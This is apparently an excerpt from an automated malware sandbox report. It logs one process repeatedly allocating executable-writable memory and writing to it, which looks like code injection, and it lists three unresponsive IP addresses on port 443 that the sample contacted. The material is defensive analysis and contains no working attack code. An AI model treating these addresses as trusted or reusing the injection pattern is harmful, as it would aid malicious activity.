NtAllocateVirtualMemory Sept. 23, 2021, 5:16 p.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000260000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f0	1	0
WriteProcessMemory Sept. 23, 2021, 5:16 p.m.	buffer: HeapFree base_address: 0x0000000000260000 process_identifier: 1016 process_handle: 0x00000000000003f0	1	1
NtAllocateVirtualMemory Sept. 23, 2021, 5:16 p.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000270000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f0	1	0
WriteProcessMemory Sept. 23, 2021, 5:16 p.m.	buffer: 6æväv& base_address: 0x0000000000270000 process_identifier: 1016 process_handle: 0x00000000000003f0	1	1
WriteProcessMemory Sept. 23, 2021, 5:16 p.m.	buffer: ,ëv +æv/æv Ùävð@wÀ/!w0!ww' base_address: 0x00000000000a0000 process_identifier: 1016 process_handle: 0x00000000000003f0	1	1
NtAllocateVirtualMemory Sept. 23, 2021, 5:16 p.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000260000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f0	1	0
WriteProcessMemory Sept. 23, 2021, 5:16 p.m.	buffer: HeapSize base_address: 0x0000000000260000 process_identifier: 1016 process_handle: 0x00000000000003f0	1	1
NtAllocateVirtualMemory Sept. 23, 2021, 5:16 p.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000270000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f0	1	0
WriteProcessMemory Sept. 23, 2021, 5:16 p.m.	buffer: 6æväv& base_address: 0x0000000000270000 process_identifier: 1016 process_handle: 0x00000000000003f0	1	1

Connects to IP addresses that are no longer responding to requests (legitimate services will remain up-and-running usually) (3 events)

dead_host	60.51.47.65:443
dead_host	185.56.175.122:443
dead_host	221.147.172.5:443

inlinelots.png

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All